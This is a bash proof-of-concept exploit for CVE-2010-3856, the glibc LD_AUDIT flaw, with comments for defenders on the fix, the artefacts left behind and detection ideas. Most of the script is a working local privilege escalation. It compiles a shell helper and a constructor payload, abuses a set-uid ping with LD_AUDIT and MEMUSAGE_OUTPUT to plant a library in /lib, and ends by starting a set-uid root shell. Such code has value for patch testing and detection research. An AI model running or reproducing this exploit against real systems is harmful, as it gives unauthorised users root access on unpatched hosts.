CVE-2010-3856.sh
#!/bin/bash
# CVE-2010-3856 proof of concept.
#
# The flaw: the glibc dynamic loader honoured LD_AUDIT for privileged
# (set-uid) programs, so a library found in a trusted library directory is
# loaded as an audit object and its constructors run with the privileges of
# the target program.
#
# Defender notes:
#   - Fix: install the vendor glibc update that addresses this CVE.
#   - Files this script creates or touches: /tmp/sh.c, /tmp/sh (left set-uid
#     root if the run succeeds), /tmp/payload.c, /tmp/exploit, /lib/sploit.so
#     (unlinked again by the payload's constructor).
#   - Detection ideas: a set-uid program executed with LD_AUDIT or
#     MEMUSAGE_OUTPUT in its environment (needs telemetry that records the
#     environment); a file under /lib that no package owns; a set-uid root
#     binary appearing under /tmp.
#   - Mounting /tmp nosuid only defeats the last step (the set-uid bit on
#     /tmp/sh is ignored); the constructor has already run privileged by
#     then, so it is not a substitute for the glibc fix.

# umask 0: the file later created at MEMUSAGE_OUTPUT by the privileged ping
# process ends up world-writable. The unprivileged `cat > /lib/sploit.so`
# further down depends on that.
umask 0
# Write sh.c: a helper that sets uid/gid to 0 and execs /bin/sh, passing the
# environment through. On its own it gains nothing; it only matters once the
# payload below makes the compiled binary set-uid root.
# (The heredoc delimiter is unquoted, so the shell would expand $ and
# backticks in the body; the body contains neither.)
cat > /tmp/sh.c << EOF
#include <unistd.h>
#include <stdio.h>
int main (int argc, char **argv, char **envp)
{
char *args[] = { "/bin/sh", NULL };
setuid(0);// setuid(geteuid());
setgid(0);// setgid(getegid());
seteuid(0);
// setreuid(0);
execve(args[0], args, envp);
perror("execve failed");
return 0;
}
EOF
gcc /tmp/sh.c -o /tmp/sh
# Write payload.c: a shared object whose constructor (run at load time,
# before main of the host program) removes /lib/sploit.so, then changes
# /tmp/sh to owner root:root with mode set-uid + rwxr-xr-x.
cat > /tmp/payload.c << EOF
void __attribute__((constructor)) init()
{
unlink("/lib/sploit.so");
setuid(0);
setgid(0);
chown("/tmp/sh", 0, 0);
chmod("/tmp/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
return 0;
}
EOF
# -w turns off all compiler warnings for this build.
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
# First ping run: libmemusage.so is loaded as the audit library and
# MEMUSAGE_OUTPUT names the file it writes, so /lib/sploit.so is created by a
# privileged process. This presumes ping is installed set-uid root on the
# target -- not shown here; confirm per system.
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/sploit.so" ping 2>/dev/null
# Overwrite the (world-writable, see umask above) file with the compiled
# payload, as the unprivileged user.
cat /tmp/exploit > /lib/sploit.so
rm /tmp/payload.c /tmp/exploit
# Second ping run: the planted file is named as the audit library by bare
# name, so the loader finds it in /lib and its constructor runs.
LD_AUDIT="sploit.so" ping
# Start the helper; it yields a root shell only if the constructor's
# chown/chmod on /tmp/sh succeeded.
/tmp/sh